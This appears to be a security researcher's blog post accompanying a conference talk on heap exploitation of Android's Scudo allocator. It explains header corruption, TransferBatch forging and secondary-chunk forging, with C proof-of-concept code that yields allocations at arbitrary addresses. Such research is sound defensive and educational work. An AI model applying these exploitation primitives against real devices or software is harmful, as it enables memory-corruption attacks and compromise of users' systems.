Scudo Allocator Exploitation

This is a post made to accompany my BSides Canberra 2023 talk of the same name (plus slides and PoCs) - as a blog is often preferable to a video, and offers new insight. I will say that I am very late in writing this - the research was primarily done in June 2023, and debuted in September 2023. Since then, scudo has already seen significant changes - primarily the addition of a quarantine for secondary chunks. Hopefully this blog still serves as a useful source!

I will note that this doesn’t aim to be an explanation of scudo’s internals - the talk does a better job of that, as do other articles (such as un1fuzz’s, along with other articles on scudo internals generally).

Last thing - this is based on the Android config of scudo.

Existing Resources

The main existing research (at the time of writing):

un1fuzz - Great overview of internals, plus techniques for double-returning a chunk and getting a chunk at an arbitrary address.

infosectbr - On breaking the checksums used to verify chunk headers

Both are great articles, so thanks to the authors for writing them. I will note that some of the techniques listed here build off un1fuzz’s techniques, so reading their articles will help.

Techniques

Forging TransferBatches

This is by far the most complex exploit in this blog, and by far my least favourite. Fully understanding it will probably require a lot of deep-diving into scudo’s code. The latter two techniques are more robust and easier to apply. Nonetheless, in cases without secondary chunks, it is useful.

The first goal is to forge a TransferBatch - that is, to have a chunk we can write to allocated as a TransferBatch. This requires an Out-of-Bounds write to corrupt the header. We additionally need to corrupt the forged TransferBatch’s contents, which could be done with a Use-After-Free, or by spraying chunks in the same region so that some of those chunks look like ‘part’ of the TransferBatch (if they’re allocated after the forged chunk).

Let’s start on the exploit. First, we allocate, then free the ‘target’ chunk, so that it enters quarantine. Then, we corrupt its header. A chunk’s header typically looks like:

typedef u64 PackedHeader;
// Update the 'Mask' constants to reflect changes in this structure.
struct UnpackedHeader {
  uptr ClassId : 8;
  u8 State : 2;
  // Origin if State == Allocated, or WasZeroed otherwise.
  u8 OriginOrWasZeroed : 2;
  uptr SizeOrUnusedBytes : 20;
  uptr Offset : 16;
  uptr Checksum : 16;
};
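The bitfield layout can be mirrored with a small packing helper (a sketch; it leaves Offset and Checksum zero - the 16-bit checksum at bits 48-63 still has to be fixed up separately, e.g. via the approach in infosectbr’s article):

```c
#include <stdint.h>

/* Pack the fields of UnpackedHeader above into their u64 bit positions:
 * ClassId [0-7], State [8-9], OriginOrWasZeroed [10-11],
 * SizeOrUnusedBytes [12-31]. Offset [32-47] and Checksum [48-63] are
 * left zero here and must be handled separately. */
static uint64_t pack_header(uint64_t class_id, uint64_t state,
                            uint64_t origin, uint64_t size_or_unused) {
    return  (class_id       & 0xff)
         | ((state          & 0x3)     << 8)
         | ((origin         & 0x3)     << 10)
         | ((size_or_unused & 0xfffff) << 12);
}
```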

We want to set its ClassId to 0. When a chunk is being freed, a ClassId of 0 indicates a chunk from the secondary allocator, and it is sent to the corresponding free (which we don’t want to happen). Otherwise, however, a ClassId of 0 is reserved for internal use with TransferBatch-es, which look like:

struct TransferBatch {                                                                                                      
    TransferBatch *Next;

   private:
    CompactPtrT Batch[MaxNumCached];
    u16 Count;
};

Thus, when a chunk in quarantine is de-quarantined and returned to the appropriate region’s freelist - if it has a ClassId of 0 in its header, it goes to Region 0’s freelist.

CRITICAL NOTE - the order of regions is randomised, so region 0 may be before or after any given region. If the chunk we are smuggling in lives in a region that is before region 0 in memory, this exploit will SIGSEGV and fail. The talk covers this in more detail - or try the PoC and explore with a debugger. This is a major flaw of this technique, which will fail 50% of the time (since, as said, the ordering of regions is random).

So, after corrupting the target’s header whilst it’s in quarantine, we flush the quarantine by allocating and freeing many chunks. The size of the quarantine is known from the config, so we know exactly how many allocations it takes to get our ‘target’ flushed out.
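In code, the flush boils down to churning allocations through the quarantine (a sketch - QUARANTINE_BYTES is a placeholder, the real capacity comes from the target’s config, e.g. the QuarantineSizeKb / ThreadLocalQuarantineSizeKb options):

```c
#include <stdlib.h>

#define QUARANTINE_BYTES (256 * 1024)  /* placeholder: read from the config */
#define CHURN_SIZE 0x100

/* Freeing enough bytes behind our corrupted target pushes it out of the
 * quarantine and back onto a region freelist. */
static void flush_quarantine(void) {
    for (size_t freed = 0; freed <= QUARANTINE_BYTES; freed += CHURN_SIZE)
        free(malloc(CHURN_SIZE));
}
```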

Next, we need to cause a TransferBatch allocation. When a region’s cache of chunks is empty, it’s refilled via a TransferBatch - but if there are none of those, the allocator creates some TransferBatches for the region. Simply put, we need to allocate enough chunks to exhaust a region’s cache, triggering our forged chunk to be made into a proper TransferBatch.
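As a sketch, exhausting the cache is just a burst of allocations that we never free (CACHE_REFILL is a placeholder - the real count depends on MaxNumCached and the per-class cache size in the config):

```c
#include <stdlib.h>

#define CACHE_REFILL 64  /* placeholder: depends on the config's cache sizes */

/* Drain the per-class cache for one size class; the next allocation then
 * forces a refill from a TransferBatch (and, with none left, the creation
 * of new batches - including from our forged chunk). */
static void exhaust_region_cache(size_t class_size) {
    for (int i = 0; i < CACHE_REFILL; i++)
        (void)malloc(class_size);  /* keep them allocated: don't refill the cache */
}
```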

In the PoC, this is done by the same batch of allocations that flushes the quarantine.

Now - the struct responsible for storing a region’s cached chunks is called PerClass. These are all stored in an array, within the big struct that holds essentially all of the data for the primary allocator. After this array is a field called Allocator - which controls a lot of the actual allocator behaviour. We want to corrupt the Allocator pointer to point at a region of memory we control.

struct scudo::SizeClassAllocatorLocalCache {
  private:
    static const scudo::uptr NumClasses;
    static const scudo::uptr BatchClassId;
    scudo::SizeClassAllocatorLocalCache::PerClass PerClassArray[45];
    scudo::LocalStats Stats;
    SizeClassAllocator *Allocator;
    ...
};

The plan hinges on the refill: when a TransferBatch replenishes a PerClass’s cache of chunks, it’s essentially a memcpy into the PerClass, with the count taken from TransferBatch.Count.

Thus, we corrupt TransferBatch.Count to be large enough that the memcpy overwrites Allocator, and place the value we want Allocator set to as an ‘entry’ in the TransferBatch. We also add a 0 for later.

    //Corrupt count for our TransferBatch!! :))
    ((unsigned int *)chunk)[11] = 0x40a;

    // Corrupt Allocator of SizeClassAllocatorLocalCache
    chunk[0x202] = (unsigned long)fakeAllocator;
    chunk[0x203] = 0;

More allocations from the region our TransferBatch was allocated for will cause the refill to occur. Now, we control Allocator.

SizeClassAllocator (the type of Allocator) has an array of structs called RegionInfo, which define the info for each region. Namely, the field RegionBeg of RegionInfo is critically important.

For the region we corrupted, within our fake allocator we’ll set RegionBeg to be our target address - 0x10 (the 0x10 accounts for the header). Then our allocation, which initially triggered the refill, will return our target address.

Technically, the 0 we wrote above is the offset from the region’s base at which the chunk we’re allocating sits. With an offset of 0, we effectively nullify this.
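Putting the fake allocator together might look like the sketch below. All the layout constants are hypothetical and must be recovered from your target build with a debugger - only the RegionBeg = target - 0x10 relation comes from the discussion above:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical layout constants -- recover the real offsets from your
 * target's scudo build with a debugger. */
#define REGION_INFO_OFF  0x100  /* offset of the RegionInfo array in SizeClassAllocator */
#define REGION_INFO_SIZE 0x200  /* sizeof(RegionInfo) */
#define REGION_BEG_OFF   0x10   /* offset of RegionBeg within RegionInfo */

/* Point RegionBeg for the given class at target - 0x10, so the allocation
 * that triggered the refill returns target (0x10 covers the primary
 * chunk header). */
static void build_fake_allocator(unsigned char *fake, unsigned class_id,
                                 uintptr_t target) {
    unsigned char *region = fake + REGION_INFO_OFF + class_id * REGION_INFO_SIZE;
    uintptr_t region_beg = target - 0x10;
    memcpy(region + REGION_BEG_OFF, &region_beg, sizeof(region_beg));
}
```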

And just like that, we have a chunk at our target address.

Full PoC here

Corrupting Secondary Chunks to get Arb-write

Secondary chunks have an additional, ‘secondary’ header in addition to the primary header.

 struct alignas(Max<uptr>(archSupportsMemoryTagging()
                            ? archMemoryTagGranuleSize()
                            : 1,
                        1U << SCUDO_MIN_ALIGNMENT_LOG)) Header {
   LargeBlock::Header *Prev;
   LargeBlock::Header *Next;
   uptr CommitBase;
   uptr CommitSize;
   MemMapT MemMap;
 };

The field we are mainly concerned about is CommitBase. This is a pointer which defines the ‘base’ of the allocation. Assuming a scenario where we can corrupt a secondary chunk’s header, if we can set CommitBase to point to where we want to corrupt, then upon freeing and reallocating that secondary chunk, it will be at our target address.

There is one downside - the header section of the chunk (which takes up 80 bytes before the user-allocation) must obviously be writeable. Meaning if you’re trying to write to the start of a section, with unwriteable memory before it, you’ll get a SIGSEGV. In the related PoC, the variable target is our target, but we also define the variable big so that there’s a writeable region before target. Without big, we would SIGSEGV trying to get a chunk at target.

Some deeper details - The code to determine the address for the user-allocation and the header-position is:

const uptr CommitBase = Entries[I].CommitBase;
if (!CommitBase)
    continue;
const uptr CommitSize = Entries[I].CommitSize;
const uptr AllocPos =
    roundDown(CommitBase + CommitSize - Size, Alignment);                               
HeaderPos =
    AllocPos - Chunk::getHeaderSize() - LargeBlock::getHeaderSize();

Assuming we corrupt the header, we control CommitBase (the most important part) and CommitSize. Additionally, Size is the number of bytes we’re allocating plus 80, which we may or may not control.

The short of it is, we need to balance these so that AllocPos == target_addr. In the related PoC, we set CommitSize to be 80 more than we allocate, to account for the header, and set CommitBase to 80 bytes before our target.
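The arithmetic can be lifted into a tiny helper to check a candidate balancing offline before committing to a corruption (a sketch; plug in your own CommitBase/CommitSize/Size values and see where AllocPos lands):

```c
#include <stdint.h>

/* round_down as used by scudo's AllocPos computation. */
static uintptr_t round_down(uintptr_t x, uintptr_t align) {
    return x & ~(align - 1);
}

/* AllocPos = roundDown(CommitBase + CommitSize - Size, Alignment),
 * per the snippet quoted above. */
static uintptr_t alloc_pos(uintptr_t commit_base, uintptr_t commit_size,
                           uintptr_t size, uintptr_t alignment) {
    return round_down(commit_base + commit_size - size, alignment);
}
```

Note how the slack between CommitSize and the request pins AllocPos at a fixed distance from CommitBase, which is what makes the balancing in the PoC work.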

PoC (+ here):

#include <stdio.h>
#include <stdlib.h>

unsigned long big[0x2000] = {0};
char target[64];

int main() {
    unsigned long * bigChunk = malloc(0x20000);

    bigChunk[-7] = 0x20050; //CommitSize
    bigChunk[-8] = (unsigned long)target - 0x50;  //CommitBase
                                                  
    free(bigChunk);
    unsigned long * forgedChunk = malloc(0x20000);

    printf("Address of target is %p\n", target);
    printf("Address of forged chunk is %p\n", forgedChunk);
}

Forging Secondary Chunks to get Arb-Write

Similar to how we can corrupt secondary chunks to get arbitrary writes, we can also forge secondary chunks. The only important difference between a secondary chunk and a normal chunk is the addition of a secondary header, which lies before the primary header.

Assuming we can allocate and write to several primary chunks of the same region, it’s pretty easy to:

1. Allocate one designated chunk
2. Corrupt its header to set the region to 0
3. Spray however many extra chunks in the same region. The contents of these chunks should all be fake secondary headers
4. Free and reallocate the designated chunk

The scudo allocator randomises the chunks of a region in batches, so that allocations aren’t contiguous. However, if we allocate enough chunks, and make them all contain the fake secondary header, then one will land directly before the designated chunk, making it look like the designated chunk has a secondary header.

Then it’s the same principle: set CommitBase and CommitSize accordingly to get a chunk at your designated address.

PoC (full version here):

...
enum AllocationState { Available = 0, Allocated = 1, Quarantined = 2};

int make_state(int classId, enum AllocationState state, int size) {
    return classId | (state << 8) | (size << 12);
}

unsigned long big[0x2000] = {0};
char globalTarget[64];

int main() {
    ...

    unsigned long * chunk = malloc(0x40);
    size_t normal_cksum = (*(chunk-2)) >> 48;

    int old_state = make_state(4, Allocated, 0x40);
    int new_state = make_state(0, Allocated, 0x40);

    size_t corrupted_cksum = find_cksum(normal_cksum, old_state, new_state);
    (*(chunk-2)) = (corrupted_cksum << 48) | new_state;

    for (int i = 0 ; i < 0x1000 ; i++) {
        unsigned long * tmp = malloc(0x40);

        tmp[0] = 0;
        tmp[1] = 0;
        tmp[2] = (unsigned long)globalTarget - 0x50;
        tmp[3] = 0x20050;
    }

    free(chunk);

    unsigned long * forged = malloc(0x20000);
    printf("forged chunk is at %p\n", forged);
    printf("target is at %p\n", globalTarget);
}

Misc

These are things that I’ve found useful when exploiting the allocator, but that aren’t really deep or novel enough to be called ‘techniques’.

Secondary Chunk Info-leak

Lots of effort went into ensuring that the ‘primary’ chunk header contains no pointers, so that in the event of an Out-of-Bounds read, no info-leak occurs (ignoring the user contents).

The secondary header, however, does contain pointers derived from mmap, as most secondary chunks are mmapped. Since mmapped chunks are often contiguous with shared libraries, this can give you an info-leak for those libraries.

It’s important to note that the header is before the user content in memory, so one either needs to read before the user content (e.g. with a negative index), or to read ‘between’ secondary chunks. However, there is (generally) a guard page after each secondary chunk, which makes the latter difficult.
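As a sketch, with an out-of-bounds read primitive the leak is just a negative-index read into the header - the index assumes the 0x50-byte combined header layout used in the PoCs above (CommitBase at word index -8 from the user pointer, matching bigChunk[-8] in the corruption PoC):

```c
/* Read the CommitBase field back out of a secondary chunk's header:
 * the combined header is 0x50 bytes, with CommitBase at offset 0x10,
 * i.e. 0x40 bytes before the user pointer (index -8 in 8-byte words).
 * The value is an mmap-derived pointer: your info-leak. */
static unsigned long leak_commit_base(const unsigned long *user) {
    return user[-8];
}
```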

Aside: to avoid unneeded memory allocations, the secondary allocator does cache and re-use chunks, so maybe one could:

1. Allocate a massive secondary chunk
2. Free it
3. Allocate two smaller secondary chunks such that they both fit inside the first

I’m not sure off the top of my head whether there’d then be a guard page? ¯\_(ツ)_/¯

Corrupting shared libraries

Similarly to the info-leak, because mmapped chunks may be contiguous with shared libraries, you might be able to use an Out-of-Bounds write on a secondary chunk to corrupt shared library contents.

Cross-Cache chunks

Similar to the ‘Forging TransferBatches’ technique, nothing says we must corrupt the region to be 0. We can set it to any region we want, thus smuggling the chunk into a different region. We’ll still SIGSEGV if the target region is before the chunk’s origin region, and it’s overall much more situational.

Conclusion

Thanks for reading! I hope you found the article useful. If you have any questions, send them to me on twitter or (preferably) discord. Both can be found here